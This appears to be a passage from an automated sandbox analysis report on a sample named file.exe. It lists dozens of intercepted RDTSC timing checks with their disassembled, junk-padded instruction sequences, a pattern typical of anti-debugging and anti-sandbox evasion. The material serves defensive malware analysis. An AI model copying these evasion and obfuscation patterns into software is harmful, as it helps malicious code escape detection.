              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30823 second address: 4F3086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007F5A4CBCDC70h 0x00000010 jns 00007F5A4CBCDCB4h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5A4CBCDC6Dh 0x0000001f jmp 00007F5A4CBCDC6Bh 0x00000024 popfd 0x00000025 mov ax, 4CBFh 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3086F second address: 4F30875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30875 second address: 4F30885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30885 second address: 4F30889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30889 second address: 4F3088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3088D second address: 4F30893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20267 second address: 4F20279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20279 second address: 4F2027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2027D second address: 4F2028F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2028F second address: 4F202B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov si, ED7Bh 0x00000010 mov esi, 0931E657h 0x00000015 popad 0x00000016 je 00007F5A4D20ABCBh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F202B7 second address: 4F202BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F202BB second address: 4F202CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20405 second address: 4F20436 instructions: 0x00000000 rdtsc 0x00000002 mov ch, B3h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F5A4CBCDCDAh 0x0000000d pushad 0x0000000e mov cx, di 0x00000011 jmp 00007F5A4CBCDC6Dh 0x00000016 popad 0x00000017 cmp dword ptr [ebp-14h], edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5A4CBCDC6Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20436 second address: 4F204F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A4D20AA07h 0x00000009 or cx, 6E1Eh 0x0000000e jmp 00007F5A4D20AA09h 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F5ABEC48A1Bh 0x00000020 jmp 00007F5A4D20A9FAh 0x00000025 mov ebx, dword ptr [ebp+08h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F5A4D20A9FEh 0x0000002f sbb esi, 0DDDC348h 0x00000035 jmp 00007F5A4D20A9FBh 0x0000003a popfd 0x0000003b jmp 00007F5A4D20AA08h 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-2Ch] 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5A4D20A9FDh 0x0000004d add ah, 00000016h 0x00000050 jmp 00007F5A4D20AA01h 0x00000055 popfd 0x00000056 mov ecx, 68286587h 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F204F3 second address: 4F204F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F204F9 second address: 4F204FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F204FD second address: 4F2051F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5A4CBCDC77h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2051F second address: 4F20537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4D20AA04h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20537 second address: 4F2053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2053B second address: 4F20551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edi 0x00000010 mov ecx, 2586C35Bh 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20551 second address: 4F205A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F5A4CBCDC6Eh 0x0000000f push eax 0x00000010 jmp 00007F5A4CBCDC6Bh 0x00000015 nop 0x00000016 pushad 0x00000017 pushad 0x00000018 mov edx, eax 0x0000001a mov ax, 545Dh 0x0000001e popad 0x0000001f pushad 0x00000020 mov ebx, eax 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5A4CBCDC6Ah 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F205A1 second address: 4F205A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F205A7 second address: 4F205C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F205C0 second address: 4F205C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F205C6 second address: 4F205CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F205CC second address: 4F205D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20058 second address: 4F20067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20067 second address: 4F20093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A4D20AA05h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20093 second address: 4F20099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20099 second address: 4F2009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2009D second address: 4F200D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a movzx ecx, di 0x0000000d popad 0x0000000e mov dword ptr [esp], ecx 0x00000011 pushad 0x00000012 mov bx, ax 0x00000015 mov ax, D3B1h 0x00000019 popad 0x0000001a mov dword ptr [ebp-04h], 55534552h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5A4CBCDC73h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CB1 second address: 4F20CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CB7 second address: 4F20CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CBB second address: 4F20CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CBF second address: 4F20CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, si 0x0000000f mov dx, si 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CD2 second address: 4F20CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5A4D20A9FDh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CF8 second address: 4F20CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20CFE second address: 4F20D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20D02 second address: 4F20D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f jmp 00007F5A4CBCDC6Fh 0x00000014 je 00007F5ABE5FB945h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5A4CBCDC75h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20D3D second address: 4F20D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20D42 second address: 4F20D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30032 second address: 4F300BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ch, bh 0x0000000d pushad 0x0000000e call 00007F5A4D20AA06h 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F5A4D20A9FBh 0x0000001a or cl, FFFFFFAEh 0x0000001d jmp 00007F5A4D20AA09h 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 jmp 00007F5A4D20AA01h 0x0000002e mov eax, dword ptr [eax] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F5A4D20A9FCh 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F300BB second address: 4F30114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5A4CBCDC71h 0x00000009 xor si, 7446h 0x0000000e jmp 00007F5A4CBCDC71h 0x00000013 popfd 0x00000014 mov bx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f mov bx, F2CEh 0x00000023 movsx ebx, cx 0x00000026 popad 0x00000027 pop eax 0x00000028 jmp 00007F5A4CBCDC6Eh 0x0000002d call 00007F5ABE5F36CFh 0x00000032 push 76952B70h 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov eax, dword ptr [esp+10h] 0x00000042 mov dword ptr [esp+10h], ebp 0x00000046 lea ebp, dword ptr [esp+10h] 0x0000004a sub esp, eax 0x0000004c push ebx 0x0000004d push esi 0x0000004e push edi 0x0000004f mov eax, dword ptr [769B4538h] 0x00000054 xor dword ptr [ebp-04h], eax 0x00000057 xor eax, ebp 0x00000059 push eax 0x0000005a mov dword ptr [ebp-18h], esp 0x0000005d push dword ptr [ebp-08h] 0x00000060 mov eax, dword ptr [ebp-04h] 0x00000063 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006a mov dword ptr [ebp-08h], eax 0x0000006d lea eax, dword ptr [ebp-10h] 0x00000070 mov dword ptr fs:[00000000h], eax 0x00000076 ret 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30114 second address: 4F30118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30118 second address: 4F30135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30135 second address: 4F30178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007F5A4D20AA04h 0x00000016 sbb cx, 9008h 0x0000001b jmp 00007F5A4D20A9FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30178 second address: 4F3017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3017E second address: 4F301A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-1Ch], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5A4D20AA09h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301A6 second address: 4F301BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301BB second address: 4F301C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301C1 second address: 4F301C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301C5 second address: 4F301C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301DC second address: 4F301E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301E0 second address: 4F301F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F301F0 second address: 4F30212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A4CBCDC71h 0x00000008 pop esi 0x00000009 mov ecx, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30212 second address: 4F30216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F30216 second address: 4F3021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3021C second address: 4F3022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4D20A9FAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3022A second address: 4F3022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40034 second address: 4F40086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5A4D20AA06h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F5A4D20AA00h 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5A4D20AA07h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40086 second address: 4F40170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5A4CBCDC6Fh 0x00000008 pop esi 0x00000009 mov bh, 34h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F5A4CBCDC6Bh 0x00000014 xchg eax, esi 0x00000015 jmp 00007F5A4CBCDC76h 0x0000001a mov esi, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5A4CBCDC6Eh 0x00000024 xor si, 4858h 0x00000029 jmp 00007F5A4CBCDC6Bh 0x0000002e popfd 0x0000002f call 00007F5A4CBCDC78h 0x00000034 jmp 00007F5A4CBCDC72h 0x00000039 pop eax 0x0000003a popad 0x0000003b test esi, esi 0x0000003d jmp 00007F5A4CBCDC71h 0x00000042 je 00007F5ABE5DBEF9h 0x00000048 pushad 0x00000049 mov eax, 3A126C73h 0x0000004e popad 0x0000004f cmp dword ptr [769B459Ch], 05h 0x00000056 jmp 00007F5A4CBCDC75h 0x0000005b je 00007F5ABE5F3FB0h 0x00000061 jmp 00007F5A4CBCDC6Eh 0x00000066 xchg eax, esi 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F5A4CBCDC6Ah 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40170 second address: 4F40174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40174 second address: 4F4017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4017A second address: 4F4019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5A4D20A9FDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4019E second address: 4F401A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F401A2 second address: 4F401A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40200 second address: 4F40204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40204 second address: 4F40221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40221 second address: 4F40227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40227 second address: 4F40271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, dx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F5A4D20AA01h 0x00000018 and ecx, 406E11A6h 0x0000001e jmp 00007F5A4D20AA01h 0x00000023 popfd 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40271 second address: 4F402A7 instructions: 0x00000000 rdtsc 0x00000002 mov ax, F8D7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5A4CBCDC78h 0x00000011 sub cl, 00000078h 0x00000014 jmp 00007F5A4CBCDC6Bh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628E39E second address: 628DC20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cld 0x0000000d jne 00007F5A4D20A9FDh 0x00000013 push dword ptr [ebp+122D0089h] 0x00000019 pushad 0x0000001a call 00007F5A4D20A9FDh 0x0000001f mov dword ptr [ebp+122D1D0Bh], ebx 0x00000025 pop ecx 0x00000026 popad 0x00000027 call dword ptr [ebp+122D2267h] 0x0000002d pushad 0x0000002e clc 0x0000002f xor eax, eax 0x00000031 sub dword ptr [ebp+122D1DAAh], edi 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b mov dword ptr [ebp+122D1DAAh], esi 0x00000041 mov dword ptr [ebp+122D38C2h], eax 0x00000047 clc 0x00000048 mov esi, 0000003Ch 0x0000004d jmp 00007F5A4D20A9FDh 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 pushad 0x00000057 mov cl, 82h 0x00000059 cld 0x0000005a popad 0x0000005b mov dword ptr [ebp+122D3522h], edi 0x00000061 lodsw 0x00000063 mov dword ptr [ebp+122D1D0Bh], edi 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D1E84h], edi 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 jmp 00007F5A4D20AA02h 0x0000007c nop 0x0000007d pushad 0x0000007e js 00007F5A4D20A9F8h 0x00000084 pushad 0x00000085 popad 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 popad 0x0000008a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64083F6 second address: 6408400 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A4CBCDC66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F97CA second address: 63F97D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jng 00007F5A4D20A9F6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F97D9 second address: 63F97F8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5A4CBCDC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F5A4CBCDC6Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F97F8 second address: 63F9800 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F9800 second address: 63F9806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
